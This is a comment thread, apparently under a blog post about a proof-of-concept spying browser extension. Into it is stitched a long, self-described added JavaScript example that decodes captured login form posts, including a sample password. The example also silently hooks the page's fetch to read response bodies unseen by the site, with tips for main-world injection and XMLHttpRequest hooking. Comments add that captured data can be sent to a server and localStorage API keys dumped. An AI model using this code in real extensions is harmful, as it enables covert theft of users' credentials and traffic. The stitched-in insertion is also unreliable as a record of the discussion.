17 Comments

epic and terrifying

Some vendors store API keys in the localStorage, so you could dump those if you wanted as well. Browser extensions can be very dangerous and in a corporate environment they need to be reviewed and controlled.

Great point. I might do a followup post with more 'sploits.

Discussed on Hacker News:

https://news.ycombinator.com/item?id=34889243

I was testing this out, but can’t find where the logs are stored

I tried it myself and all the warnings were presented. Did they fix it?

Hi Matt, great article!

I do have a quick question regarding the network capturing traffic part of the extension: is there any way to also get the server response as well (since webRequest beforeRequest is triggered before receiving any server side data)? I had an issue in the past with the webRequest API and couldn't find a way to get the response without making a new web request from the background service code.
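The network capture asked about in the comment above, as an added example that is not code from the post, its author, or the commenter. It assumes a background listener registered with `chrome.webRequest.onBeforeRequest` and the `"requestBody"` extra-info option, plus a script injected into the page's main world; the function names, the `sink` array and the sample login post are my own stand-ins. The first part decodes the request body Chrome hands to the listener. Since Chrome's webRequest API never delivers response bodies (Firefox has `browser.webRequest.filterResponseData` for that; Chrome has no equivalent), the second part shows the usual workaround: wrap `window.fetch` in the page so a clone of each response can be read while the page still receives the unread original.

```javascript
// Added example, not code from the original post. Written as plain functions
// so the logic runs outside a browser. In a real extension the listener
// would be registered from the background script with
//   chrome.webRequest.onBeforeRequest.addListener(listener,
//       { urls: ["<all_urls>"] }, ["requestBody"])
// and hookFetch(window, sink) would be injected into the page's main world.

// Decode the `requestBody` object chrome.webRequest.onBeforeRequest delivers.
// Chrome fills in either `formData` ({ field: [value, ...] }, for urlencoded
// and multipart posts) or `raw` (an array of { bytes: ArrayBuffer } chunks,
// or { file: path } for file uploads). Response data is never included.
function decodeRequestBody(requestBody) {
  if (!requestBody) return null;
  if (requestBody.formData) {
    return Object.entries(requestBody.formData)
      .flatMap(([field, values]) => values.map((v) => `${field}=${v}`))
      .join("&");
  }
  if (Array.isArray(requestBody.raw)) {
    const decoder = new TextDecoder();
    return requestBody.raw
      .map((chunk) => (chunk.bytes ? decoder.decode(chunk.bytes) : `<file:${chunk.file}>`))
      .join("");
  }
  return null;
}

// Build an onBeforeRequest listener that records each request into `sink`
// (a plain array here; a real extension would batch and ship it off).
// The listener returns nothing, so the request proceeds unchanged.
function makeRequestListener(sink) {
  return function onBeforeRequest(details) {
    sink.push({
      url: details.url,
      method: details.method,
      body: decodeRequestBody(details.requestBody),
    });
  };
}

// Constructed sample of what Chrome passes for a login form post (assumed
// shape, for demonstration only). Returns the record the listener produces.
function captureSampleLogin() {
  const sink = [];
  const sampleLoginPost = {
    url: "https://example.test/login",
    method: "POST",
    requestBody: { formData: { user: ["alice"], pass: ["hunter2"] } },
  };
  makeRequestListener(sink)(sampleLoginPost);
  return sink[0];
}

// Page-world side: wrap `target.fetch` (window.fetch in a browser) so the
// response body is read from a clone. The page keeps the unread original,
// so the hook is invisible to the site's own code. Returns an uninstaller.
function hookFetch(target, sink) {
  const original = target.fetch;
  target.fetch = function (input, init) {
    const url = typeof input === "string" ? input : input.url || String(input);
    return original.call(target, input, init).then((response) => {
      response.clone().text().then((text) => {
        sink.push({ url, status: response.status, response: text });
      });
      return response;
    });
  };
  return function uninstall() {
    target.fetch = original;
  };
}
```

Two caveats for anyone trying this: content scripts run in an isolated world, so the hook has to be injected into the page's main world (for example `chrome.scripting.executeScript` with `world: "MAIN"`), and `XMLHttpRequest` needs the same wrapping treatment, since a site may use either API.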

As one of the core-team members of rrweb, I was afraid you were going to misuse rrweb for this case. Happy to see you didn't, but at the same time terrified that it would very much be possible to use it for this.

Great article, but what can you do with the captured data? Can you send it to a server?

Yes, data you collect could be sent to your server, using an HTTP or WebSocket call.

But maybe the browser has a protection against that?

If you have access to the dev tools of an extension (background page in MV2, service worker in MV3), then you could use the debugger and read all data stored in memory. You could also check data that is saved/loaded from, e.g., local storage.

I will use a Chrome extension for another example. You could set the so-called access level: https://developer.chrome.com/docs/extensions/reference/storage/#type-AccessLevel

By default you have the trusted level. But as you can read here: https://groups.google.com/a/chromium.org/g/chromium-extensions/c/il2DYn49HAw?pli=1, it can be applied to session storage only.

Actually, Manifest v2 is already pretty limited, with no way to interact with the browser interface, browser-generated pages (unless the extension explicitly states it needs that ability and the user flips the flag in their browser and gets bothered by a warning every time they start their browser; this one isn't available in WebExtensions, though), or extension-generated pages, in effect making things like (context-aware, but even more basic) mouse gestures, keyboard shortcuts, and GUI tweakers impossible.

Fix typo: "how it an be captured"

Dark Reader and the like are an issue for security, but could easily be built into Chromium. Chromium already has a broken version of Dark Reader built in, and built in it is much faster. But we need whitelisting and blacklisting abilities at the minimum. This is a common thing that should be built in instead of an extension.

The only other thing that is pretty much universally needed is extensions for password managers. Perhaps there's a way to better secure that too, but I've not seen exploits for browser password extensions yet, though they may exist.

Is there a way to use this to save all pages of Google Books offline for perusal, say as a PDF or just raw image captures of every single page available?